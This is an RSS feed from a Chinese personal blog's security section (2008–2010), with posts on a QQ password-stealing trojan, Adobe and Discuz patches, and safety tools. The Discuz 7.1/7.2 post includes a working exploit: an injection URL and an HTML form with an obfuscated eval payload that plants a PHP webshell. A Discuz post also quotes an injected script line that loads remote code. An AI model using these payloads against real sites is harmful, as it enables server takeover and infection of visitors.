<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Lin&#039;s Space&#124;Only &#187; 安全</title>
	<atom:link href="http://clin003.com/category/safe/feed/" rel="self" type="application/rss+xml" />
	<link>http://clin003.com</link>
	<description>If you my only , I will give you my all.</description>
	<lastBuildDate>Thu, 02 Sep 2010 07:07:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>群共享“女人必看”与“传统男人对老婆的5大不讲理”病毒</title>
		<link>http://clin003.com/safe/nvrenbikan-chuantongnanrenduinvrendewudabujiangli-2036/</link>
		<comments>http://clin003.com/safe/nvrenbikan-chuantongnanrenduinvrendewudabujiangli-2036/#comments</comments>
		<pubDate>Tue, 10 Aug 2010 03:29:41 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[QQ群]]></category>
		<category><![CDATA[预防病毒]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=2036</guid>
		<description><![CDATA[群共享“女人必看”病毒： 若不小心打开“女人必看”中的可疑程序，木马首先会显示一张美女的照片，盗号木马在后台运行，释放假的comres.dll文件替换系统文件comres.dll(系统会报告“没有找到comres.dll”)，将盗取的用户QQ号和密码发到指定邮箱。然后盗号者再以你的名义登录QQ，将含有“女人必看”的压缩文件上传到所有QQ群。 金山安全专家指出，用户电脑出现comres.dll找不到，应用程序无法运行时，可能同时伴随QQ号被盗的情况，可立即使用金山网盾进行修复。金山安全专家同时建议用户应在杀毒后，立即修改QQ登录密码，QQ群管理员应立即删除群共享空间出现的可疑文件，将上传可疑文件的被盗QQ号清理出群，避免病毒进一步扩散。 PS：这病毒真是稀奇古怪，，这么具有“诱惑”性，，金山毒霸云安全中心监测到的数据表明，利用QQ群共享传播类似病毒的报告，自8月1日以来，已累计超过10万次。 相关链接： 群共享“女人必看”传病毒 一周入侵10万用户 http://www.duba.net/zt/news/2010081001.shtml Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/safe/nvrenbikan-chuantongnanrenduinvrendewudabujiangli-2036/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>群共享“女人必看”病毒：<br />
若不小心打开“女人必看”中的可疑程序，木马首先会显示一张美女的照片，盗号木马在后台运行，释放假的comres.dll文件替换系统文件comres.dll(系统会报告“没有找到comres.dll”)，将盗取的用户QQ号和密码发到指定邮箱。然后盗号者再以你的名义登录QQ，将含有“女人必看”的压缩文件上传到所有QQ群。</p>
<p>金山安全专家指出，用户电脑出现comres.dll找不到，应用程序无法运行时，可能同时伴随QQ号被盗的情况，可立即使用<a href="http://www.duba.net/wangdun">金山网盾</a>进行修复。金山安全专家同时建议用户应在杀毒后，立即修改QQ登录密码，QQ群管理员应立即删除群共享空间出现的可疑文件，将上传可疑文件的被盗QQ号清理出群，避免病毒进一步扩散。</p>
<p>PS：这病毒真是稀奇古怪，，这么具有“诱惑”性，，金山毒霸云安全中心监测到的数据表明，利用QQ群共享传播类似病毒的报告，自8月1日以来，已累计超过10万次。<br />
相关链接：<br />
群共享“女人必看”传病毒 一周入侵10万用户 <a href="http://www.duba.net/zt/news/2010081001.shtml">http://www.duba.net/zt/news/2010081001.shtml</a></p>
<hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/nvrenbikan-chuantongnanrenduinvrendewudabujiangli-2036/" >http://clin003.com/safe/nvrenbikan-chuantongnanrenduinvrendewudabujiangli-2036/</a> <br /> <a href="http://clin003.com/safe/nvrenbikan-chuantongnanrenduinvrendewudabujiangli-2036/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/nvrenbikan-chuantongnanrenduinvrendewudabujiangli-2036/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adobe Illustrator CS4 and CS3未明缓冲区溢出漏洞</title>
		<link>http://clin003.com/safe/security-updates-available-for-adobe-illustrator-cs4-and-cs3-1884/</link>
		<comments>http://clin003.com/safe/security-updates-available-for-adobe-illustrator-cs4-and-cs3-1884/#comments</comments>
		<pubDate>Thu, 14 Jan 2010 12:56:55 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[Illustrator]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1884</guid>
		<description><![CDATA[受影响版本：Adobe Illustrator CS4 (14.0.0) and Adobe Illustrator CS3 (13.0.3 及之前版本), 受影响操作系统环境：Platform: Windows 和 Macintosh 描述：Adobe Illustrator是一款adobe公司最新出品的矢量图编辑软件。 Windows和Macintosh平台上的Adobe Illustrator CS4 (14.0.0)和Adobe Illustrator CS3 (13.0.3和之前版本)存在一个严重漏洞，允许攻击者以应用程序权限执行任意指令。（The vulnerabilities could lead to arbitrary code execution. ） 解决办法：Adobe已经提供了升级补丁 1、如果正在运行Illustrator CS4，请先退出。 2、打开Illustrator CS4的安装目录并备份 < 安装路径>\Adobe Illustrator CS4\Support &#8230; <a href="http://clin003.com/safe/security-updates-available-for-adobe-illustrator-cs4-and-cs3-1884/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><strong>受影响版本：</strong>Adobe Illustrator CS4 (14.0.0) and Adobe Illustrator CS3 (13.0.3 及之前版本),</p>
<p><strong>受影响操作系统环境：</strong>Platform: Windows 和 Macintosh</p>
<p><strong>描述：</strong>Adobe Illustrator是一款adobe公司最新出品的矢量图编辑软件。<br />
Windows和Macintosh平台上的Adobe Illustrator CS4 (14.0.0)和Adobe Illustrator CS3 (13.0.3和之前版本)存在一个严重漏洞，允许攻击者以应用程序权限执行任意指令。（The vulnerabilities could lead to arbitrary code execution. ）</p>
<p><strong>解决办法：</strong>Adobe已经提供了升级补丁</p>
<p>1、如果正在运行Illustrator CS4，请先退出。<br />
2、打开Illustrator CS4的安装目录并备份 < 安装路径>\Adobe Illustrator CS4\Support Files\Contents\Windows\MPS.dll<br />
3、下载补丁文件（http://download.macromedia.com/pub/security/bulletins/apsb10-01/win/APSB10_01_CS4_Win.zip），解压。<br />
4、替换步骤2中的文件 MPS.dll < 安装路径>\Adobe Illustrator CS4\Support Files\Contents\Windows\<br />
5. 删除 Illustrator 用户配置文件<br />
Windows XP:  {drive}\Documents and Settings\{user}\Application Data\Adobe\Adobe  Illustrator CS4 Settings\<br />
Windows Vista: {drive}\Users\{user}\AppData\Roaming\Adobe\Adobe Illustrator CS4 Settings\<br />
6、 运行 Illustrator CS4 </p>
<p>打补丁参考：http://www.adobe.com/support/security/bulletins/apsb10-01.html</p>
<p>PS：前些天打算亲自动手做Logo，就装了这个，今天为这个不常用的家伙打安全更新补丁！</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/linux/fedora-11-yum-1832/" rel="bookmark" title="Permanent Link: 配置 yum 为 Fedora 11 快速更新软件">配置 yum 为 Fedora 11 快速更新软件</a></li><li><a href="http://clin003.com/suggested-contents/download-youtube-video-by-tools-flvplay-1243/" rel="bookmark" title="Permanent Link: 又一下载YouTube视频利器FLVPlay">又一下载YouTube视频利器FLVPlay</a></li><li><a href="http://clin003.com/ideas/adobe-actionscript-3-allownetworking-internal-1792/" rel="bookmark" title="Permanent Link: 安全引用Flash视频，allownetworking=&#8221;internal&#8221; 参数的应用">安全引用Flash视频，allownetworking=&#8221;internal&#8221; 参数的应用</a></li><li><a href="http://clin003.com/netbar/vista-youjiancaidancaidanqingli-2013/" rel="bookmark" title="Permanent Link: 快速(Vista)右键菜单清理“多余”选项">快速(Vista)右键菜单清理“多余”选项</a></li><li><a href="http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/" rel="bookmark" title="Permanent Link: WordPress < 2.8.1 Security Bypass 0day">WordPress < 2.8.1 Security Bypass 0day</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/security-updates-available-for-adobe-illustrator-cs4-and-cs3-1884/" >http://clin003.com/safe/security-updates-available-for-adobe-illustrator-cs4-and-cs3-1884/</a> <br /> <a href="http://clin003.com/safe/security-updates-available-for-adobe-illustrator-cs4-and-cs3-1884/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/security-updates-available-for-adobe-illustrator-cs4-and-cs3-1884/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)</title>
		<link>http://clin003.com/safe/discuz72-uchome20-20100110-1880/</link>
		<comments>http://clin003.com/safe/discuz72-uchome20-20100110-1880/#comments</comments>
		<pubDate>Wed, 06 Jan 2010 15:50:38 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[Discuz]]></category>
		<category><![CDATA[UCHome]]></category>
		<category><![CDATA[安全补丁]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1880</guid>
		<description><![CDATA[两个重要更新补丁包 涉及版本 Discuz! 7.1 , Discuz! 7.2 Discuz! 重要安全补丁 20100110 For Discuz! 7.1 Discuz! 7.2 本补丁包只适用于 UCenter Home 2.0 正式版 UCHome 2.0 正式版 20100106补丁包 从sebug获知，discuz 1.0最近爆出一个跨站漏洞和一个注入漏洞，另外从群里获知dz7.1和7.2存在“php远程执行代码”漏洞（上边的补丁包中已经修复）。uchome在特定php环境配置（register_globals为on）下存在一个注入漏洞。 Discuz! 7.1 &#38; 7.2 远程代码执行漏洞细节 Discuz！新版本7.1与7.2版本中的include目录global.func.php中的showmessage函数内eval执行的参数($scriptlang)未初始化，可以任意提交，从而可以执行任意PHP命令。另外misc.php中showmessage使用的$response没有初始化可以作为一个利用点。 漏洞利用原理 showmessage函数里$vars = explode(&#8216;:&#8217;, $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组。 简单的检测是否漏洞存在 注册一个用户登陆,然后提交 misc.php?action=imme_binding&#38;response[result]=1:2&#38;scriptlang[1][2]={${phpinfo()}} &#8230; <a href="http://clin003.com/safe/discuz72-uchome20-20100110-1880/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>两个重要更新补丁包</p>
<p>涉及版本<br />
Discuz! 7.1 , Discuz! 7.2<br />
<a href="http://www.discuz.net/thread-1537673-1-1.html">Discuz! 重要安全补丁 20100110 For Discuz! 7.1 Discuz! 7.2 </a></p>
<p>本补丁包只适用于 UCenter Home 2.0 正式版<br />
<a href="http://www.discuz.net/thread-1537784-1-1.html">UCHome 2.0 正式版 20100106补丁包</a></p>
<p>从sebug获知，discuz 1.0最近爆出一个<a href="http://sebug.net/vulndb/15192/">跨站漏洞</a>和一个<a href="http://sebug.net/vulndb/15193/">注入漏洞</a>，另外从群里获知dz7.1和7.2存在“php远程执行代码”漏洞（上边的补丁包中已经修复）。uchome在特定php环境配置（register_globals为on）下存在一个注入漏洞。</p>
<p><strong>Discuz! 7.1 &amp; 7.2 远程代码执行漏洞细节</strong><br />
Discuz！新版本7.1与7.2版本中的include目录global.func.php中的showmessage函数内eval执行的参数($scriptlang)未初始化，可以任意提交，从而可以执行任意PHP命令。另外misc.php中showmessage使用的$response没有初始化可以作为一个利用点。</p>
<p><strong>漏洞利用原理</strong><br />
showmessage函数里$vars = explode(&#8216;:&#8217;, $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组。</p>
<p><strong>简单的检测是否漏洞存在</strong><br />
注册一个用户登陆,然后提交<br />
misc.php?action=imme_binding&amp;response[result]=1:2&amp;scriptlang[1][2]={${phpinfo()}}</p>
<p>漏洞分析参考：<a href="http://www.oldjun.com/blog/index.php/archives/58/">Discuz! 7.1 &amp; 7.2 远程代码执行漏洞</a></p>
<p>补充HTML测试代码：<br />
<span id="more-1880"></span></p>
<blockquote><p>
&lt;form method=&#8221;post&#8221; action=&#8221;http://bbs.XXXX.com/misc.php&#8221; enctype=&#8221;multipart/form-data&#8221;&gt;<br />
帖子ID，指定一个存在的帖子即可：&lt;input type=&#8221;text&#8221; name=&#8221;tid&#8221; value=&#8221;1&#8243; /&gt;<br />
&lt;input type=&#8221;hidden&#8221; name=&#8221;action&#8221; value=&#8221;imme_binding&#8221; /&gt;<br />
&lt;input type=&#8221;hidden&#8221; name=&#8221;response[result]&#8221; value=&#8221;1:2&#8243; /&gt;<br />
&lt;input type=&#8221;hidden&#8221; name=&#8221;scriptlang[1][2]&#8221; value=&#8221;${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}&#8221; /&gt;<br />
&lt;input type=&#8221;submit&#8221; name=&#8221;topicsubmit&#8221; value=&#8221;提交&#8221; /&gt;<br />
&lt;/form&gt;
</p></blockquote>
<p>forumdata/cache/usergroup_01.php cmd 生成的一句话</p>
<hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/discuz72-uchome20-20100110-1880/" >http://clin003.com/safe/discuz72-uchome20-20100110-1880/</a> <br /> <a href="http://clin003.com/safe/discuz72-uchome20-20100110-1880/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/discuz72-uchome20-20100110-1880/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>借助Browser Defender查看邻居是否危险</title>
		<link>http://clin003.com/safe/browser-defender-website-safety-lookup-1652/</link>
		<comments>http://clin003.com/safe/browser-defender-website-safety-lookup-1652/#comments</comments>
		<pubDate>Sun, 01 Mar 2009 01:48:41 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[SNS]]></category>
		<category><![CDATA[今日一点]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[BackType]]></category>
		<category><![CDATA[Browser Defender]]></category>
		<category><![CDATA[评论跟踪]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1652</guid>
		<description><![CDATA[今天查看邮件，发觉两个挺有意思的“Alerts”发来的Mail： 第一个，内容为 杂碎1：借助Browser Defender查看邻居是否危险 Browser Defender™ &#8211; Report for clin003.com Browser Defender evaluates web sites for malicious downloads, exploits, phishing , annoyances such as excessive pop-ups, and other fraudulent practices. 点进去一看，原来是PCtools的Browser Defender对这个博客的检测结果页面，很好，很安全。:) We have assessed this site and in our &#8230; <a href="http://clin003.com/safe/browser-defender-website-safety-lookup-1652/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>今天查看邮件，发觉两个挺有意思的“Alerts”发来的Mail：</p>
<p><strong>第一个，内容为</strong><br />
<strong>杂碎1：借助Browser Defender查看邻居是否危险</strong></p>
<blockquote><p>Browser Defender™ &#8211; Report for clin003.com<br />
Browser Defender evaluates web sites for malicious downloads, exploits, phishing , annoyances such as excessive pop-ups, and other fraudulent practices.</p></blockquote>
<p>点进去一看，原来是PCtools的Browser Defender对<a href="http://www.browserdefender.com/site/clin003.com/" target="_blank">这个博客的检测结果页面</a>，很好，很安全。:)</p>
<blockquote><p>We have assessed this site and in our view it is safe to visit.</p></blockquote>
<p>值得提出的是她可以帮忙查看从我这个博客出去的链接（大多为友情链接）是否都是安全的！</p>
<blockquote><p>Online affiliations for clin003.com<br />
Our testing of this site found no dangerous offsite links.<br />
Links to other sites<br />
Loading&#8230;<br />
Analysis 	URL<br />
&#8230;</p></blockquote>
<p>还好有一个被警告（非友情链接，这说明Browser Defender给出的报告包括但不局限于友情链接，啰嗦！）之外其他都是安全和未知的。</p>
<p>最后看下Browser Defender的英文说明来</p>
<blockquote><p>Browser Defender is a utility which protects your computer by providing you with an informative and helpful assessment of websites and the possible dangers they pose, thereby allowing you to make better informed choices when you browse the Internet.</p>
<p>A simple green, red or yellow rating lets you know immediately if, in ThreatExpert&#8217;s opinion, the website is safe to visit, harmful or needs to be visited with caution. If the website is not amongst our millions of crawled domains, then a grey rating will be shown. If you wish to submit a site to be assessed you can do so from the Browser Defender website.</p></blockquote>
<p>另外还有针对Firefox的插件Toolbar可以使用<br />
<a href="https://addons.mozilla.org/zh-CN/firefox/addon/8909" target="_blank">Browser Defender Toolbar</a></p>
<p>当然从官方网站也能直接下到用于ie的“插件”Toolbar。</p>
<p>第二封邮件，内容为<br />
<strong>杂碎1：借助BackType来追踪个人在开放博客空间的评论</strong></p>
<blockquote><p>Comments by clin003.com — BackType<br />
Comments by clin003.com on Lin&#8217;s空间|Only, Ericulous &#8211; WordPress Themes, Plugins , Tips and Tricks and more.</p></blockquote>
<p>进去后发现，大眼一看，这个地址全是抓取的这个博客的留言（feed）（非全部）！一下还没看出啥名堂来，首页的PR为5！</p>
<p>没错，是用来跟踪留言评论的，方便在任何开放评论的网站跟踪自己留下的评论（相当于自己的评论中心），还是来看看他的英文介绍吧</p>
<blockquote><p>BackType is a service that lets you find, follow and share comments from across the web. Whenever you fill out the &#8220;Website&#8221; or &#8220;URL&#8221; field in a comment form when you publish a comment on a blog or other website, BackType attributes it to you. We give comment authors a profile featuring all the comments they&#8217;ve written on the Internet. If you don&#8217;t have a website to use when you fill out comment forms, sign up and use one of ours.</p></blockquote>
<p>偶英文不好，就不来翻译啦。<br />
跟踪的评论的“唯一性”有可能是根据留下的“用户名”和“网址”来判断的。</p>
<p>我不知道http://www.backtype.com/url/clin003.com 这个链接从她的主页上是怎么进去的，但通过这个链接演化一下把后边的地址改成“Dianso”在我博客留言使用的网址的话，发现能够看到“Dianso”在别的空间的留言内容（哇哈哈，发现新大陆啦）。<br />
这样看来是非常方便自己追踪自己在开放博客或者空间的留言记录啦 <img src='http://clin003.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' />  。真是个不错的东东，可惜英文的，对中文博客的跟踪即时性要缺失很多啦（看到她的<a href="http://www.backtype.com/comments" target="_blank">首页的留言追踪记录</a>在几分钟内）。</p>
<p>理想情况：这样似乎就不用担心自己在任何一个博客的<a href="http://www.caozenghui.cn/archives/512.html" target="_blank">评论分散问题</a>啦。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/ideas/filefox-offline-mode-1422/" rel="bookmark" title="Permanent Link: Filefox Offline Mode（火狐的脱机模式）">Filefox Offline Mode（火狐的脱机模式）</a></li><li><a href="http://clin003.com/suggested-contents/firefox-3-beta-5-628/" rel="bookmark" title="Permanent Link: firefox 3 beta 5发布">firefox 3 beta 5发布</a></li><li><a href="http://clin003.com/ideas/set-a-default-browser-1258/" rel="bookmark" title="Permanent Link: 设置默认浏览器">设置默认浏览器</a></li><li><a href="http://clin003.com/suggested-contents/let-website-rapid-multi-language-support-188/" rel="bookmark" title="Permanent Link: 让网站快速支持多国语言">让网站快速支持多国语言</a></li><li><a href="http://clin003.com/google/gmail-setting-browser-connection-https-1395/" rel="bookmark" title="Permanent Link: Gmail安全链接">Gmail安全链接</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/browser-defender-website-safety-lookup-1652/" >http://clin003.com/safe/browser-defender-website-safety-lookup-1652/</a> <br /> <a href="http://clin003.com/safe/browser-defender-website-safety-lookup-1652/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/browser-defender-website-safety-lookup-1652/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>今日杂碎：预设QQ第二代密码保护结果</title>
		<link>http://clin003.com/safe/account-qq-com-service-at-tencent-com-1596/</link>
		<comments>http://clin003.com/safe/account-qq-com-service-at-tencent-com-1596/#comments</comments>
		<pubDate>Sat, 22 Nov 2008 00:43:00 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[QQ]]></category>
		<category><![CDATA[密码保护]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1596</guid>
		<description><![CDATA[恭喜您，您QQ号码[*******]已经正式获得第二代密码保护！马上到这里体验新的保护功能吧！ 。。。 不容易啊，而且这次申请还不到一星期就ok啦（以前都是3个月的观察期！！，而且结果都是没通过考验，第二代密码保护申请失败）！ 关于QQ的其他链接： QQ异常通知 http://yichang.qq.com/ QQ帐号服务中心 https://account.qq.com/ 腾讯客服 http://service.qq.com/ Related posts:今日杂碎：感谢QQ工作人员人工审核空间日志今日杂碎：Service UnavailableGoogle Page Creator 服务迁移Splinter(Gtalk)的免费网络电话谷歌跳转到香港，Google中文搜索正式退出中国大陆Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/safe/account-qq-com-service-at-tencent-com-1596/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<blockquote><p>恭喜您，您QQ号码[*******]已经正式获得第二代密码保护！马上到这里体验新的保护功能吧！<br />
。。。
</p></blockquote>
<p>不容易啊，而且这次申请还不到一星期就ok啦（以前都是3个月的观察期！！，而且结果都是没通过考验，第二代密码保护申请失败）！</p>
<p>关于QQ的其他链接：</p>
<p>QQ异常通知 http://yichang.qq.com/<br />
QQ帐号服务中心 https://account.qq.com/<br />
腾讯客服 http://service.qq.com/</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/about/qqkongjian-vs-baidukongjian-1983/" rel="bookmark" title="Permanent Link: 今日杂碎：感谢QQ工作人员人工审核空间日志">今日杂碎：感谢QQ工作人员人工审核空间日志</a></li><li><a href="http://clin003.com/ideas/service-unavailable-and-temporary-error-1683/" rel="bookmark" title="Permanent Link: 今日杂碎：Service Unavailable">今日杂碎：Service Unavailable</a></li><li><a href="http://clin003.com/google/google-page-creator-migration-1744/" rel="bookmark" title="Permanent Link: Google Page Creator 服务迁移">Google Page Creator 服务迁移</a></li><li><a href="http://clin003.com/suggested-contents/service-splinter-net-303/" rel="bookmark" title="Permanent Link: Splinter(Gtalk)的免费网络电话">Splinter(Gtalk)的免费网络电话</a></li><li><a href="http://clin003.com/google/google-tuichuzhongguodalu-1902/" rel="bookmark" title="Permanent Link: 谷歌跳转到香港，Google中文搜索正式退出中国大陆">谷歌跳转到香港，Google中文搜索正式退出中国大陆</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/account-qq-com-service-at-tencent-com-1596/" >http://clin003.com/safe/account-qq-com-service-at-tencent-com-1596/</a> <br /> <a href="http://clin003.com/safe/account-qq-com-service-at-tencent-com-1596/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/account-qq-com-service-at-tencent-com-1596/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>紧急对比更新Discuz论坛安全补丁包[20081117]</title>
		<link>http://clin003.com/safe/discuz-wap-20081117-1584/</link>
		<comments>http://clin003.com/safe/discuz-wap-20081117-1584/#comments</comments>
		<pubDate>Mon, 17 Nov 2008 12:14:55 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[Discuz]]></category>
		<category><![CDATA[Wap]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1584</guid>
		<description><![CDATA[chinaz论坛爆“Discuz被挂马，受害人数三万多。官方补丁已出，赶紧打上吧 ”，补丁已出（http://download.comsenz.com/Discuz/patch/ ），不过在半小时前官方才放出来，都还在郁闷官方为啥没放补丁呢！ 这次出问题的又是Wap字符转换问题，看来这个wap鸡肋可以去掉了，看官方给出的安全补丁公告： http://www.discuz.net/thread-1113736-1-1.html 经查，Discuz! wap 功能部分在对文字进行编码转换时，存在合法变量被恶意覆盖问题，此问题将可能导致您的论坛受到安全性威胁。为此我们强烈建议您立即下载补丁进行修补。 * 此补丁包中含有 Discuz! 各版本程序，解开压缩包后，请根据您的版本号更新 * 本次修正不包含 Discuz! 7.0 测试版，建议参与测试的站点暂时关闭wap功能 * 如果您由于某种原因，无法及时修补，请您暂时关闭 &#8220;wap&#8221; 功能 据了解，是被修改了  menu.js document.writeln(&#8220;&#60;script language=javascript src=http:\/ \/www.54zc.cn\/17aq\/a.js&#62;&#60;\/script&#62;&#8221;) 在某网站统计服务网站查看，截止11月17日中午，受害人数已达34713人。 下午四点左右，Discuz官方康盛技术支持提供了Disucz！安全补丁 CommentsNovember 18, 2008, uusee网络电视 writes: 下午我的一个网站才更新了补丁...好像很严重一样...Related posts:使用Discuz插件的同学需要注意了Discuz! X1: &#8220;内部错误，无法显示此内容&#8221; 的纠结问题【附参考解决办法】完美解决Discuz官方国庆模板页头广告错位方法Discuz! 与 &#8230; <a href="http://clin003.com/safe/discuz-wap-20081117-1584/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>chinaz论坛爆“Discuz被挂马，受害人数三万多。官方补丁已出，赶紧打上吧 ”，补丁已出（http://download.comsenz.com/Discuz/patch/ ），不过在半小时前官方才放出来，都还在郁闷官方为啥没放补丁呢！</p>
<p>这次出问题的又是Wap字符转换问题，看来这个wap鸡肋可以去掉了，看官方给出的安全补丁公告：</p>
<p>http://www.discuz.net/thread-1113736-1-1.html</p>
<p>经查，Discuz! wap 功能部分在对文字进行编码转换时，存在合法变量被恶意覆盖问题，此问题将可能导致您的论坛受到安全性威胁。为此我们强烈建议您立即下载补丁进行修补。</p>
<p>* 此补丁包中含有 Discuz! 各版本程序，解开压缩包后，请根据您的版本号更新</p>
<p>* 本次修正不包含 Discuz! 7.0 测试版，建议参与测试的站点暂时关闭wap功能</p>
<p>* 如果您由于某种原因，无法及时修补，请您暂时关闭 &#8220;wap&#8221; 功能</p>
<p>据了解，是被修改了  menu.js</p>
<p>document.writeln(&#8220;&lt;script language=javascript src=http:\/ \/www.54zc.cn\/17aq\/a.js&gt;&lt;\/script&gt;&#8221;)</p>
<p>在某网站统计服务网站查看，截止11月17日中午，受害人数已达34713人。</p>
<p>下午四点左右，Discuz官方康盛技术支持提供了Disucz！安全补丁</p>
<hr /><h2>Comments</h2><ul><li><a href="http://clin003.com/safe/discuz-wap-20081117-1584/#comment-1712">November  18, 2008</a>, <a href='http://www.uusee5.org.cn/' rel='external nofollow' class='url'>uusee网络电视</a> writes: 下午我的一个网站才更新了补丁...好像很严重一样...</li></ul><hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/ideas/discuz-plugin-exploits-1800/" rel="bookmark" title="Permanent Link: 使用Discuz插件的同学需要注意了">使用Discuz插件的同学需要注意了</a></li><li><a href="http://clin003.com/debug/discuz-x1-neibucuowu-wufaxianshicineirong-2029/" rel="bookmark" title="Permanent Link: Discuz! X1: &#8220;内部错误，无法显示此内容&#8221; 的纠结问题【附参考解决办法】">Discuz! X1: &#8220;内部错误，无法显示此内容&#8221; 的纠结问题【附参考解决办法】</a></li><li><a href="http://clin003.com/web2o-webos/discuz-guoqignmobanyetouguanggaocuoweijiejuebanfa-1811/" rel="bookmark" title="Permanent Link: 完美解决Discuz官方国庆模板页头广告错位方法">完美解决Discuz官方国庆模板页头广告错位方法</a></li><li><a href="http://clin003.com/safe/discuz72-uchome20-20100110-1880/" rel="bookmark" title="Permanent Link: Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)">Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)</a></li><li><a href="http://clin003.com/ideas/discuz-adsense-show-1789/" rel="bookmark" title="Permanent Link: Discuz 论坛中的 AdSense 显示问题终于解决啦">Discuz 论坛中的 AdSense 显示问题终于解决啦</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/discuz-wap-20081117-1584/" 